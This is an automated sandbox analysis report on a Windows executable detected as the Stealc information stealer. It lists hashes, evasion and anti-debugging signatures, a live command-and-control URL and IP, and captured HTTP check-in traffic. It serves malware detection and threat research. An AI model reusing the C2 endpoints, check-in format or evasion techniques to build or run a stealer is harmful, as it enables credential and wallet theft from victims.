Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560037
MD5: e1dcc0eabbbedc586e3f5fd45f8735d0
SHA1: b434195b6c7d5a4d5960840d18df55cc1fc3ff79
SHA256: e20885cb4967e6f72d4c70dcb97c1fd19aefff88972723b266483a09966916ca
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2812 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E1DCC0EABBBEDC586E3F5FD45F8735D0)
  • cleanup
Malware family (Name | Description | Attribution | Link):
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2137394593.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2812 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2812 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
              No Sigma rule has matched
Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-21T10:37:16.839004+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/ba | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ka | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/ya | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/Sa | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/tingsLMEM8 | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00624C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006260D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006440B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00636960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00636B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006318A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00633910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00631269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00631250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00634B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00634B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006323A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00632390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49706 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCA
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 43 41 31 43 44 42 33 39 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a
    Data Ascii:
        ------BAFIEGIECGCBKFIEBGCA
        Content-Disposition: form-data; name="hwid"

        20CA1CDB3918194301792
        ------BAFIEGIECGCBKFIEBGCA
        Content-Disposition: form-data; name="build"

        mars
        ------BAFIEGIECGCBKFIEBGCA--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00626C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCA
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 43 41 31 43 44 42 33 39 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a
    Data Ascii:
        ------BAFIEGIECGCBKFIEBGCA
        Content-Disposition: form-data; name="hwid"

        20CA1CDB3918194301792
        ------BAFIEGIECGCBKFIEBGCA
        Content-Disposition: form-data; name="build"

        mars
        ------BAFIEGIECGCBKFIEBGCA--
Source: file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/Sa
Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ba
Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/ya
Source: file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00
Source: file.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS
Source: file.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpg
Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ka
Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/tingsLMEM8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

              System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006448B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DC192
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E51B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E59B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D89DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099C938
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B5A15
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D03D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092E3C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D5417
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DA58C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094E587
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CCD88
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00624A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: kerxdhhv ZLIB complexity 0.9947445160167131
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00643A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\DGW29PY8.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
